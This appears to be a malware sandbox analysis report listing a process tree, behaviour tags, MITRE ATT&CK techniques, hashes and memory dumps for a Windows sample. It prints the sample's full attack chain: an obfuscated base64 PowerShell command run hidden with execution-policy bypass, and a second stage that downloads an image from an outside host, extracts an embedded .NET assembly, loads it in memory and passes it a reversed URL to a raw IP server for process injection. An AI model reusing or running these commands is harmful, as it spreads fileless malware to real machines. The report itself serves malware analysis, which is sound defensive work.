⬑ ⾌YgBs♶ ━ ⢚ ⬑ ⾌Hk♶ ━ ⢚ ⬑ ⾌XQ♶ ━ ⢚ ⬑ ⾌6♶ ━ ⢚ ⬑ ⾌Do♶ ━ ⢚ ⬑ ⾌T♶ ━ ⢚ ⬑ ⾌Bv♶ ━ ⢚ ⬑ ⾌GE♶ ━ ⢚ ⬑ ⾌Z♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌o♶ ━ ⢚ ⬑ ⾌CQ♶ ━ ⢚ ⬑ ⾌YwBv♶ ━ ⢚ ⬑ ⾌G0♶ ━ ⢚ ⬑ ⾌bQBh♶ ━ ⢚ ⬑ ⾌G4♶ ━ ⢚ ⬑ ⾌Z♶ ━ ⢚ ⬑ ⾌BC♶ ━ ⢚ ⬑ ⾌Hk♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌Bl♶ ━ ⢚ ⬑ ⾌HM♶ ━ ⢚ ⬑ ⾌KQ♶ ━ ⢚ ⬑ ⾌7♶ ━ ⢚ ⬑ ⾌CQ♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌B5♶ ━ ⢚ ⬑ ⾌H♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌ZQ♶ ━ ⢚ ⬑ ⾌g♶ ━ ⢚ ⬑ ⾌D0♶ ━ ⢚ ⬑ ⾌I♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌k♶ ━ ⢚ ⬑ ⾌Gw♶ ━ ⢚ ⬑ ⾌bwBh♶ ━ ⢚ ⬑ ⾌GQ♶ ━ ⢚ ⬑ ⾌ZQBk♶ ━ ⢚ ⬑ ⾌EE♶ ━ ⢚ ⬑ ⾌cwBz♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌bQBi♶ ━ ⢚ ⬑ ⾌Gw♶ ━ ⢚ ⬑ ⾌eQ♶ ━ ⢚ ⬑ ⾌u♶ ━ ⢚ ⬑ ⾌Ec♶ ━ ⢚ ⬑ ⾌ZQB0♶ ━ ⢚ ⬑ ⾌FQ♶ ━ ⢚ ⬑ ⾌eQBw♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌K♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌n♶ ━ ⢚ ⬑ ⾌GQ♶ ━ ⢚ ⬑ ⾌bgBs♶ ━ ⢚ ⬑ ⾌Gk♶ ━ ⢚ ⬑ ⾌Yg♶ ━ ⢚ ⬑ ⾌u♶ ━ ⢚ ⬑ ⾌Ek♶ ━ ⢚ ⬑ ⾌Tw♶ ━ ⢚ ⬑ ⾌u♶ ━ ⢚ ⬑ ⾌Eg♶ ━ ⢚ ⬑ ⾌bwBt♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌Jw♶ ━ ⢚ ⬑ ⾌p♶ ━ ⢚ ⬑ ⾌Ds♶ ━ ⢚ ⬑ ⾌J♶ ━ ⢚ ⬑ ⾌Bt♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌Bo♶ ━ ⢚ ⬑ ⾌G8♶ ━ ⢚ ⬑ ⾌Z♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌g♶ ━ ⢚ ⬑ ⾌D0♶ ━ ⢚ ⬑ ⾌I♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌k♶ ━ ⢚ ⬑ ⾌HQ♶ ━ ⢚ ⬑ ⾌eQBw♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌LgBH♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌BN♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌Bo♶ ━ ⢚ ⬑ ⾌G8♶ ━ ⢚ ⬑ ⾌Z♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌o♶ ━ ⢚ ⬑ ⾌Cc♶ ━ ⢚ ⬑ ⾌VgBB♶ ━ ⢚ ⬑ ⾌Ek♶ ━ ⢚ ⬑ ⾌Jw♶ ━ ⢚ ⬑ ⾌p♶ ━ ⢚ ⬑ ⾌C4♶ ━ ⢚ ⬑ ⾌SQBu♶ ━ ⢚ ⬑ ⾌HY♶ ━ ⢚ ⬑ ⾌bwBr♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌K♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌k♶ ━ ⢚ ⬑ ⾌G4♶ ━ ⢚ ⬑ ⾌dQBs♶ ━ ⢚ ⬑ ⾌Gw♶ ━ ⢚ ⬑ ⾌L♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌g♶ ━ ⢚ ⬑ ⾌Fs♶ ━ ⢚ ⬑ ⾌bwBi♶ ━ ⢚ ⬑ ⾌Go♶ ━ ⢚ ⬑ ⾌ZQBj♶ ━ ⢚ ⬑ ⾌HQ♶ ━ ⢚ ⬑ ⾌WwBd♶ ━ ⢚ ⬑ ⾌F0♶ ━ ⢚ ⬑ ⾌I♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌o♶ ━ ⢚ ⬑ ⾌Cc♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌B4♶ ━ ⢚ ⬑ ⾌HQ♶ ━ ⢚ ⬑ ⾌LgB4♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌bQBB♶ ━ ⢚ ⬑ ⾌G4♶ ━ ⢚ ⬑ ⾌aQB0♶ ━ ⢚ ⬑ ⾌GE♶ ━ ⢚ ⬑ ⾌T♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌v♶ ━ ⢚ ⬑ ⾌Dg♶ ━ ⢚ ⬑ ⾌Lg♶ ━ ⢚ ⬑ ⾌x♶ ━ ⢚ ⬑ ⾌D♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌MQ♶ ━ ⢚ ⬑ ⾌u♶ ━ ⢚ ⬑ ⾌DM♶ ━ ⢚ ⬑ ⾌Lg♶ ━ ⢚ ⬑ ⾌y♶ ━ ⢚ ⬑ ⾌Dk♶ ━ ⢚ ⬑ ⾌MQ♶ ━ ⢚ ⬑ ⾌v♶ ━ ⢚ ⬑ ⾌C8♶ ━ ⢚ ⬑ ⾌OgBw♶ ━ ⢚ ⬑ ⾌HQ♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌Bo♶ ━ ⢚ ⬑ ⾌Cc♶ ━ ⢚ ⬑ ⾌I♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌s♶ ━ ⢚ ⬑ ⾌C♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌JwBk♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌cwBh♶ ━ ⢚ ⬑ ⾌HQ♶ ━ ⢚ ⬑ ⾌aQB2♶ ━ ⢚ ⬑ ⾌GE♶ ━ ⢚ ⬑ ⾌Z♶ ━ ⢚ ⬑ ⾌Bv♶ ━ ⢚ ⬑ ⾌Cc♶ ━ ⢚ ⬑ ⾌I♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌s♶ ━ ⢚ ⬑ ⾌C♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌JwBk♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌cwBh♶ ━ ⢚ ⬑ ⾌HQ♶ ━ ⢚ ⬑ ⾌aQB2♶ ━ ⢚ ⬑ ⾌GE♶ ━ ⢚ ⬑ ⾌Z♶ ━ ⢚ ⬑ ⾌Bv♶ ━ ⢚ ⬑ ⾌Cc♶ ━ ⢚ ⬑ ⾌I♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌s♶ ━ ⢚ ⬑ ⾌C♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌JwBk♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌cwBh♶ ━ ⢚ ⬑ ⾌HQ♶ ━ ⢚ ⬑ ⾌aQB2♶ ━ ⢚ ⬑ ⾌GE♶ ━ ⢚ ⬑ ⾌Z♶ ━ ⢚ ⬑ ⾌Bv♶ ━ ⢚ ⬑ ⾌Cc♶ ━ ⢚ ⬑ ⾌L♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌n♶ ━ ⢚ ⬑ ⾌EE♶ ━ ⢚ ⬑ ⾌Z♶ ━ ⢚ ⬑ ⾌Bk♶ ━ ⢚ ⬑ ⾌Ek♶ ━ ⢚ ⬑ ⾌bgBQ♶ ━ ⢚ ⬑ ⾌HI♶ ━ ⢚ ⬑ ⾌bwBj♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌cwBz♶ ━ ⢚ ⬑ ⾌DM♶ ━ ⢚ ⬑ ⾌Mg♶ ━ ⢚ ⬑ ⾌n♶ ━ ⢚ ⬑ ⾌Cw♶ ━ ⢚ ⬑ ⾌Jw♶ ━ ⢚ ⬑ ⾌n♶ ━ ⢚ ⬑ ⾌Ck♶ ━ ⢚ ⬑ ⾌KQ♶ ━ ⢚ ⬑ ⾌=';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('♶ ━ ⢚ ⬑ ⾌','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1048
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.xemAnitaL/8.101.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1864

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
77dc884c6fcb659d2e3a990aea2989e3

SHA1
e002e820fbc07f1385ff99278aa4c76d0179d37b

SHA256
11234d745def24fe8eb3fc4ba3a39df30166f35a40240df3c05daa0b5bce86bf

SHA512
6b6e0fc656ec58df6e9d978bd2889408273dbd6159d0b3e402ea71d285ef394f54fd794cf3bef0ab0a67ac093d6ff35613c4c200708f213a207e7c19ba80a17d

Download Submit
memory/1048-4-0x000007FEF620E000-0x000007FEF620F000-memory.dmp

Filesize
4KB

Download
memory/1048-5-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp

Filesize
9.6MB

Download
memory/1048-6-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp

Filesize
9.6MB

Download
memory/1048-7-0x000000001B320000-0x000000001B602000-memory.dmp

Filesize
2.9MB

Download
memory/1048-8-0x0000000002470000-0x0000000002478000-memory.dmp

Filesize
32KB

Download
memory/1048-9-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp

Filesize
9.6MB

Download
memory/1048-10-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp

Filesize
9.6MB

Download
memory/1048-16-0x000007FEF620E000-0x000007FEF620F000-memory.dmp

Filesize
4KB

Download
memory/1048-17-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp

Filesize
9.6MB

Download
memory/1048-18-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing